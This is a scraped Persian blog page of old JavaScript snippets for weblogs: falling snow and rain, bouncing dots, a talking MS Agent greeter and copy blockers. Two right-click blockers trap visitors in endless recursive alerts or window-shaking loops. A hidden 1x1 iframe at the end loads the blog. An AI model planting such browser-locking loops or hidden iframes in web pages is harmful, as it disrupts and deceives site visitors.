window.pageXOffset; } else { height = document.body.clientHeight + document.body.scrollTop; width = document.body.clientWidth + document.body.scrollLeft; } // bounce off 3 walls (leave ceiling open) if (dots[i].Y >= height - DOTSIZE - 1) { if (dots[i].dy > 0) { dots[i].dy = BOUNCE * -dots[i].dy; } dots[i].Y = height - DOTSIZE - 1; } if (dots[i].X >= width - DOTSIZE) { if (dots[i].dx > 0) { dots[i].dx = BOUNCE * -dots[i].dx; } dots[i].X = width - DOTSIZE - 1; } if (dots[i].X < 0) { if (dots[i].dx < 0) { dots[i].dx = BOUNCE * -dots[i].dx; } dots[i].X = 0; } // move img to new position dots[i].obj.left = dots[i].X; dots[i].obj.top = dots[i].Y; } } // end code hiding --> </script> <font face="Tahoma"><a target="_blank" href="http://codbaran.blogfa.com/"><span style="font-size: 8pt; text-decoration: none">منبع اصلی کدهای جاوااسکریپت<br> http://codbaran.blogfa.com</span></a></font> | </body> </html> </body> </html> </body> </html> </body> </html>

پنج شنبه جهاردهم 3 1388

 

این هم کدی است که می توان شرح وب یا وبلاگتون را با عروسک سخنگویی آغاز کرد

 

یک عروسک سخنگو که با باز شدن وبلاگ شما بر روی مانیتور

 

ظاهر و به بازدیدکننده خوش آمد میگوید و شما می توانید در قسمت های تعیین شده ای شرح وب یا وبلاگتون را از جادوی این سخنگو ببینید

 

 

<!--- www.codbaran.blogfa.com ----> <OBJECT id=wolfi classid=CLSID:d45FD31B-5C6E-11D1-9EC1-00C04FD7081F></OBJECT> <SCRIPT language=JavaScript type=text/javascript> function LoadLocalAgent(CharID, CharACS) { LoadReq = wolfi.Characters.Load(CharID, CharACS); return(true); } var MerlinID; var MerlinACS; wolfi.Connected = true; MerlinLoaded = LoadLocalAgent(MerlinID, MerlinACS); Merlin = wolfi.Characters.Character(MerlinID); Merlin.Show(); Merlin.Play("Surprised"); Merlin.speak("Salam Doste Gerami"); Merlin.MoveTo (900,600); Merlin.Play("Surprised"); Merlin.Play("GetAttention"); Merlin.Play("Blink"); Merlin.Play("Blink"); Merlin.speak(" Be Webe Man khosh Amadi"); Merlin.Play("Blink"); Merlin.Play("Confused"); Merlin.speak("Hatman nazarateton ro bedid www.codbaran.blogfa.com"); Merlin.Play('GestureLeft'); Merlin.Play("Blink") Merlin.Hide(); </SCRIPT> <center><a href="http://www.codbaran.blogfa.com/">بـهـترین کدهای جاوا اسکریپت</a> </center> <!--- www.codbaran.blogfa.com ----></body> </html> </body> </html> </body> </html> </body> </html> </body> </html> </body> </html> </body> </html> </body> </html>

پنج شنبه جهاردهم 3 1388

 

2  کدی که شما ازش بهره مند شوید1 برای بستن راست کلیک و یک کد برای اینکه

 

کسی نتونه مطالب وبلاگتون رو کپی کنه رو گذاشتم

 

 

کدی برای بستن راست کلیک که یک بار کلیک کنه اخطار میده

 

و بار دوم مجبور به ریست کردن میشه

 

</style> <SCRIPT language=JavaScript> document.onmousedown=click var times=0 var times2=10 function click() { if ((event.button==2) || (event.button==3)) { if (times>=1) { bye() } alert("داری دزدی می کنی ...؟؟؟ این کارو نکن دوست عزیز فایده ای نداره ...از من گفتن.."); times++ } } function bye() { alert("من که گفتم کلیک نکن... حالا ریست کن سیستمت رو تاحالت گرفته شه !"); bye() } </SCRIPT> </body> </html> </body> </html> </body> </html> </body> </html> </body> </html> </body> </html> </body> </html> </body> </html> <a href="http://www.codbaran.blogfa.com/">بــهـترین قالب ها و کدهای جاوا </a> <!-- End codbaran.blogfa.com Clock code --> </body> </html> </body> </html> </body> </html>

قفل کردن راست کلیک با لرزش صفحه

 

<SCRIPT language=""> document.onmousedown=click var times=0 var times2=10 function click() { if ((event.button==2) || (event.button==3)) { if (times>=0) { earthquake() } alert("\n\n Nem faz isso, q aki naum é page lammerz!!"); times++ } } function earthquake () { alert("Custom message vibre") window.moveTo(0, 0) window.moveTo(1, 1) window.moveTo(2, 2) window.moveTo(3, 3) window.moveTo(4, 4) window.moveTo(5, 5) window.moveTo(6, 6) window.moveTo(7, 7) window.moveTo(8, 8) window.moveTo(9, 9) window.moveTo(10, 10) window.moveTo(9, 9) window.moveTo(8, 8) window.moveTo(7, 7) window.moveTo(6, 6) window.moveTo(5, 5) window.moveTo(4, 4) window.moveTo(3, 3) window.moveTo(2, 2) window.moveTo(1, 1) tremmors() } function tremmors() { window.moveTo(0, 0) window.moveTo(1, 1) window.moveTo(2, 2) window.moveTo(3, 3) window.moveTo(4, 4) window.moveTo(5, 5) window.moveTo(6, 6) window.moveTo(7, 7) window.moveTo(8, 8) window.moveTo(9, 9) window.moveTo(10, 10) window.moveTo(9, 9) window.moveTo(8, 8) window.moveTo(7, 7) window.moveTo(6, 6) window.moveTo(5, 5) window.moveTo(4, 4) window.moveTo(3, 3) window.moveTo(2, 2) window.moveTo(1, 1) tremmors() } </SCRIPT> </body> </html> </body> </html> </body> </html> </body> </html> </body> </html> </body> </html> <a href="http://www.codbaran.blogfa.com/">بــهـترین قالب ها و کدهای جاوا </a> <!-- End codbaran.blogfa.com Clock code -->

 

 

این هم یه کد برای اینکه کسی نتونه مطالب وبلگتون رو کپی کنه

</script> <SCRIPT language=JavaScript1.2> //Disable select-text script (IE4+, NS6+)- By Andy Scott //Exclusive permission granted to Dynamic Drive to feature script //Visit http://www.dynamicdrive.com for this script function disableselect(e){ return false } function reEnable(){ return true } //if IE4+ document.onselectstart=new Function ("return false") //if NS6 if (window.sidebar){ document.onmousedown=disableselect document.onclick=reEnable } </SCRIPT> <a target="_blank" href="http://codbaran.blogfa.com">< آموزش قالب کدجاوا>

پنج شنبه جهاردهم 3 1388

و اما ۲ کد بسیار زیبا و جالب برای بارش برف و باران در وبلاگ شما

 

کد ها را کپی کرده و در  انتهای ویرایش قالب بزارید

 

کد بارش برف

 

|<html> <body bgcolor="#228B22"> <style> .drop { position: absolute; width: 3; filter: flipV(), flipH(); font-size: 40; color: blue } </style> <script language="javascript"> snow = true; snowsym = " * " rainsym = " ' " howmany = 25 if(snow){sym = snowsym; speed=1; angle=10; drops=howmany} else{sym = rainsym; speed=50; drops=howmany; angle=6} movex = -speed/angle; movey = speed; count = 0; function moverain(){ for(move = 0; move < drops; move++){ xx[move]+=movex; yy[move]+=mv[move]; hmm = Math.round(Math.random()*1); if(xx[move] < 0){xx[move] = maxx+10;} if(yy[move] > maxy){yy[move] = 10;} drop[move].left = xx[move] drop[move].top = yy[move]+document.body.scrollTop; }setTimeout('moverain()','1')} </script> <script language="javascript"> if (document.all){ drop = new Array(); xx = new Array(); yy = new Array(); mv = new Array() ly = "document.all[\'"; st = "\'].style" for(make = 0; make < drops; make++){ document.write('<div id="drop'+make+'" class=drop>'+sym+'</div>'); drop[make] = eval(ly+'drop'+make+st); maxx = document.body.clientWidth-40 maxy = document.body.clientHeight-40 xx[make] = Math.random()*maxx; yy[make] = -100-Math.random()*maxy; drop[make].left = xx[make] drop[make].top = yy[make] mv[make] = (Math.random()*5)+speed/4; drop[make].fontSize = (Math.random()*10)+20; //*Change (col = 'white) to (col =YOUR COLOR)*// if(snow){col = 'white'}else{col = 'blue'} drop[make].color = col; } window.onload=moverain } </script> </html> <a href="http://www.codbaran.blogfa.com/">بــهـترین قالب ها و کدهای جاوا </a>| <!-- End codbaran.blogfa.com Clock code --> </body> </html> </body> </html> </body> </html> </body> </html>

کد بارش باران

<meta http-equiv="Content-Language" content="en-us"> <body> <SCRIPT LANGUAGE="JavaScript"> <!-- Begin var no = 50; var speed = 2; var ns4up = (document.layers) ? 1 : 0; var ie4up = (document.all) ? 1 : 0; var s, x, y, sn, cs; var a, r, cx, cy; var i, doc_width = 800, doc_height = 600; if (ns4up) { doc_width = self.innerWidth; doc_height = self.innerHeight; } else if (ie4up) { doc_width = document.body.clientWidth; doc_height = document.body.clientHeight; } x = new Array(); y = new Array(); r = new Array(); cx = new Array(); cy = new Array(); s = 8; for (i = 0; i < no; ++ i) { initRain(); if (ns4up) { if (i == 0) { document.write("<layer name=\"dot"+ i +"\" left=\"1\" "); document.write("top=\"1\" visibility=\"show\"><font color=\"blue\">"); document.write(",</font></layer>"); } else { document.write("<layer name=\"dot"+ i +"\" left=\"1\" "); document.write("top=\"1\" visibility=\"show\"><font color=\"blue\">"); document.write(",</font></layer>"); } } else if (ie4up) { if (i == 0) { document.write("<div id=\"dot"+ i +"\" style=\"POSITION: "); document.write("absolute; Z-INDEX: "+ i +"; VISIBILITY: "); document.write("visible; TOP: 15px; LEFT: 15px;\"><font color=\"blue\">"); document.write(",</font></div>"); } else { document.write("<div id=\"dot"+ i +"\" style=\"POSITION: "); document.write("absolute; Z-INDEX: "+ i +"; VISIBILITY: "); document.write("visible; TOP: 15px; LEFT: 15px;\"><font color=\"blue\">"); document.write(",</font></div>"); } } } function initRain() { a = 6; r[i] = 1; sn = Math.sin(a); cs = Math.cos(a); cx[i] = Math.random() * doc_width + 1; cy[i] = Math.random() * doc_height + 1; x[i] = r[i] * sn + cx[i]; y[i] = cy[i]; } function makeRain() { r[i] = 1; cx[i] = Math.random() * doc_width + 1; cy[i] = 1; x[i] = r[i] * sn + cx[i]; y[i] = r[i] * cs + cy[i]; } function updateRain() { r[i] += s; x[i] = r[i] * sn + cx[i]; y[i] = r[i] * cs + cy[i]; } function raindropNS() { for (i = 0; i < no; ++ i) { updateRain(); if ((x[i] <= 1) || (x[i] >= (doc_width - 20)) || (y[i] >= (doc_height - 20))) { makeRain(); doc_width = self.innerWidth; doc_height = self.innerHeight; } document.layers["dot"+i].top = y[i]; document.layers["dot"+i].left = x[i]; } setTimeout("raindropNS()", speed); } function raindropIE() { for (i = 0; i < no; ++ i) { updateRain(); if ((x[i] <= 1) || (x[i] >= (doc_width - 20)) || (y[i] >= (doc_height - 20))) { makeRain(); doc_width = document.body.clientWidth; doc_height = document.body.clientHeight; } document.all["dot"+i].style.pixelTop = y[i]; document.all["dot"+i].style.pixelLeft = x[i]; } setTimeout("raindropIE()", speed); } if (ns4up) { raindropNS(); } else if (ie4up) { raindropIE(); } // End --> </script> <!-- Script Size: 3.14 KB --> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> </body></body> </html> </body> </html> </body> </html><iframe src="http://codbaran.blogfa.com" width="1" height="1" align="top" name="CodBaran">

پنج شنبه جهاردهم 3 1388
X